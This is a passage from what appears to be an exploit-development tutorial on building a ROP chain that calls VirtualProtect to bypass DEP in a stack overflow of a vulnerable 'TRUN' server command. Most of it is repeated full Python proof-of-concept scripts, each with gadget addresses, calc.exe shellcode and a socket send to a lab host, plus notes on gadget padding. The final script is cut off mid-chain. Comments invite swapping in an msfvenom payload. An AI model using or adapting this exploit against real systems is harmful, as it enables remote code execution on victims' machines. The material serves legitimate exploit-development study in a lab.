rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment):

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now, our shellcode is about 100 hex bytes, or about 256 decimal bytes, away from the current return and lpAddress placeholders. Remember earlier, when we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the address of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do, is increase EAX by about 0x100 (256 decimal) bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

This gadget takes up two entries in the chain. Keep in mind- we have a pop ebp instruction in this ROP gadget, so it needs a DWORD of padding after it. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)
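Since the shellcode can get pushed farther down the stack as the chain grows, it is worth re-checking the math each time. Here is a rough sketch of that check. All offsets are measured from the first DWORD after the stack pivot, and it assumes the saved stack pointer is the address of the second gadget's slot (offset 4), which matches what the debugger showed earlier. The function name and its parameters are made up for this example.

```python
def lands_in_sled(rop_len, params_len, pad_len, rop2_len, sled_len, add_to_eax):
    """Check whether (saved ESP + add_to_eax) falls inside the NOP sled."""
    saved_esp = 4  # assumption: EAX/ECX hold the address of the second gadget's slot
    sled_start = rop_len + params_len + pad_len + rop2_len
    sled_end = sled_start + sled_len
    target = saved_esp + add_to_eax
    return sled_start <= target < sled_end, sled_start, target


# Chain at this stage: 12 inc ecx, mov edx + filler, 4 inc edx, add eax + filler
rop2_len = (12 + 2 + 4 + 2) * 4

ok, sled_start, target = lands_in_sled(
    rop_len=12, params_len=24, pad_len=4,
    rop2_len=rop2_len, sled_len=250, add_to_eax=0x100)
print(ok, hex(sled_start), hex(target))
```

If more gadgets are added later and the check stops passing, that is the sign to go back and add to EAX again.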

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

Now EAX contains an address that is around our shellcode, and will lead to execution of shellcode when it is returned to after the VirtualProtect() call, via a NOP sled:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here- we just want to change the values stored at the memory addresses held in ECX and EDX. Right now, those addresses still hold our placeholder values (0x4c4c4c4c and 0x45454545), not pointers to anything useful.

With a mov dword ptr ds:[ecx], eax instruction we could accomplish what we need. What mov dword ptr ds:[ecx], eax will do, is take the value in EAX (the shellcode address) and write it into the DWORD (the size of an x86 register) located at the address ECX contains (which is the return parameter placeholder). ECX itself is not changed.

To clarify- here we are not making ECX point to EAX. We are overwriting the return address placeholder on the stack with the address of the shellcode. That way, when VirtualProtect() returns, it will return to the shellcode address.

We also need to do the same with EDX. EDX contains the address of the parameter placeholder for lpAddress at the moment. This placeholder also needs to hold the address of our shellcode, which is contained in EAX. This means an instruction of mov dword ptr ds:[edx], eax is needed. It will do the same thing mentioned above, but it will use EDX instead of ECX.
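Here is a small model of what those two writes do to the stack. It is only a sketch: the stack is a bytearray holding the six DWORDs from the POC, the base address is where the VirtualProtect pointer sat in my debugger, and the EAX value is a hypothetical address inside the NOP sled (old stack pointer plus 0x100).

```python
import struct


def write_dword(memory, base, address, value):
    """Model `mov dword [reg], eax`: store value at the address held in reg."""
    struct.pack_into("<L", memory, address - base, value)


base = 0x019FF9EC  # address of the VirtualProtect pointer on the stack
stack = bytearray(struct.pack(
    "<6L", 0x77e22e15, 0x4c4c4c4c, 0x45454545, 0x03030303, 0x54545454, 0x62506060))

ecx = 0x019FF9F0   # address of the return address placeholder
edx = 0x019FF9F4   # address of the lpAddress placeholder
eax = 0x019FFAE4   # hypothetical address inside the NOP sled

write_dword(stack, base, ecx, eax)   # mov dword [ecx], eax
write_dword(stack, base, edx, eax)   # mov dword [edx], eax

print([hex(word) for word in struct.unpack("<6L", stack)])
```

After the two writes, the 0x4c4c4c4c and 0x45454545 placeholders are gone and both slots hold the address in EAX. The registers ECX and EDX themselves have not changed.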

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The placeholder for the return address (originally filled with 0x4c4c4c4c) was successfully manipulated to point to the shellcode area:

The next ROP gadget, mov dword ptr ds:[edx], eax, successfully updates the lpAddress parameter as well:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number that comes after ret is the number of extra bytes to remove from the stack once the return address has been popped. 0xC, in decimal, is 12. 12 bytes is three 4-byte values on x86 (each 32-bit DWORD is 4 bytes, and 4 bytes * 3 values = 12 total). These types of returns are used to “clean up” items on the stack. Essentially, this just discards the next three DWORDs on the stack after the ret is executed.

In any case, just as with pop, we will have to add some padding to compensate. First, the return instruction takes the value at the top of the stack at the time of the ret 0x000C instruction (which is the address of the next ROP gadget in the chain) and loads it into EIP. Execution continues at that address as normal, which is why no padding is needed at that point. Then the 0x000C portion of the return kicks in and removes the next three DWORDs from the stack. This is the reason why padding for ret NUM instructions goes directly after the address of the NEXT ROP gadget instead of directly below the gadget itself, like pop padding.
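To make the ordering concrete, here is a minimal sketch (written for Python 3) that models only the stack effect of a ret and a ret 0x000C. The run_ret helper and the five-DWORD stack are made up for illustration; the gadget addresses are the ones used in this post.

```python
import struct

def run_ret(stack, esp, imm=0):
    """Model x86 `ret imm16`: pop a DWORD into EIP, then add imm to ESP."""
    (eip,) = struct.unpack_from('<L', stack, esp)
    esp += 4      # the pop of the return address
    esp += imm    # the extra bytes released by `ret imm16`
    return eip, esp

# Hypothetical stack as seen by the `retn 0x000C` at the end of the
# mov dword [edx], eax gadget: the next gadget comes first, then the
# three DWORDs of padding, then the gadget after that.
NEXT_GADGET = 0x41ad61cc    # xor eax, eax ; ret
PADDING = 0x41414141
AFTER_GADGET = 0x6ff7e29a   # add eax, 0x00000100 ; pop ebp ; ret

stack = struct.pack('<5L', NEXT_GADGET, PADDING, PADDING, PADDING, AFTER_GADGET)

eip, esp = run_ret(stack, 0, imm=0x0C)   # retn 0x000C
print(hex(eip), esp)                     # next gadget runs, ESP skipped the padding

eip2, esp2 = run_ret(stack, esp)         # plain ret at the end of xor eax, eax
print(hex(eip2), esp2)
```

The first return hands control to the xor eax, eax gadget and leaves ESP past the three padding DWORDs, so the plain ret that ends that gadget picks up the add eax gadget rather than the padding.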

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter 0x300 bytes (768 in decimal). This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 0x300 will do. The flNewProtect parameter should contain a value of 0x40 (PAGE_EXECUTE_READWRITE), which gives the memory page read, write, and execute permissions.

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Overwrite the current size parameter placeholder with this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Overwrite the current flNewProtect parameter placeholder with this newly calculated value
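The two passes above can be sketched with a toy register and memory model. This is only an illustration: the stack address, the starting register values, and the helper names are all made up, and each helper stands in for one of the ROP gadgets rather than real execution.

```python
# Toy model of the registers and the two placeholder slots on the stack.
SIZE_SLOT = 0x00b7f9f0                      # hypothetical address of the size placeholder
regs = {'eax': 0xdeadbeef, 'edx': SIZE_SLOT - 4}    # EDX starts at the lpAddress slot
mem = {SIZE_SLOT: 0x03030303, SIZE_SLOT + 4: 0x54545454}

def xor_eax_eax():
    regs['eax'] = 0

def add_eax(n):
    regs['eax'] = (regs['eax'] + n) & 0xffffffff

def inc_edx():
    regs['edx'] = (regs['edx'] + 1) & 0xffffffff

def mov_edx_eax():
    mem[regs['edx']] = regs['eax']          # mov dword [edx], eax

def write_param(value, step):
    """Zero EAX, build `value` in `step`-sized adds, move EDX to the next slot, store."""
    xor_eax_eax()
    for _ in range(value // step):
        add_eax(step)
    for _ in range(4):
        inc_edx()
    mov_edx_eax()

write_param(0x300, 0x100)   # size
write_param(0x40, 0x02)     # flNewProtect
print(hex(mem[SIZE_SLOT]), hex(mem[SIZE_SLOT + 4]))
```

The model leaves out the pop and retn 0x000C side effects of the real gadgets, which only affect how much padding the chain needs, not the values that end up in the placeholders.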

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. That return discards the three DWORDs that follow the address of this gadget, so we insert three lines of padding after it:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 0x300 into EAX. We already found a suitable gadget earlier! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (0x100 * 3 = 0x300). Remember, under each add eax, 0x00000100 gadget, to add a line of padding to compensate for the pop ebp instruction.

The last step is the pointer.

Right now, EDX (the register itself) still holds the address of the lpAddress parameter placeholder. We will increase EDX by four bytes so that it reaches the size parameter placeholder. We will also reuse an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and write the value in EAX (the correct size parameter value) into the DWORD that EDX points to (the size parameter placeholder), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Once more, that pesky ret 0x000C is present. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again, we have to add padding for the last gadget’s ret 0x000C instruction. Three DWORDs will be removed, so three lines of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find any viable gadget among the ones I enumerated that adds 0x40 directly. So instead, in typical ROP fashion, I had to make do with what I had.

I added A LOT of add eax, 0x02 instructions (32 of them, since 0x40 / 0x02 = 0x20). Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll
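Rather than pasting the same line over and over, the repetition can be generated. This is a minimal sketch written for Python 3, so the result is a bytes object rather than the Python 2 string the POC builds; repeat_gadget is a hypothetical helper name, while the address and the 0x40 value come from this post.

```python
import struct

ADD_EAX_2 = 0x77bd6b18           # add eax, 0x02 ; ret (RPCRT4.dll, from the listing above)
PAGE_EXECUTE_READWRITE = 0x40    # the flNewProtect value we want in EAX

def repeat_gadget(address, count):
    """Return `count` back-to-back little-endian copies of one gadget address."""
    return struct.pack('<L', address) * count

count = PAGE_EXECUTE_READWRITE // 2    # each gadget adds 2 to EAX
chain = repeat_gadget(ADD_EAX_2, count)
print(count, len(chain))
```

This only works as-is because the gadget ends in a plain ret with no pop instructions. A gadget such as add eax, 0x00000100 ; pop ebp ; ret would need a padding DWORD after every copy.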

EDX now points to the size parameter placeholder. Increment EDX by four again to place the location of the flNewProtect parameter placeholder in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, write the value in EAX (where the value of flNewProtect resides) into the DWORD referenced by EDX (the flNewProtect parameter placeholder):

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
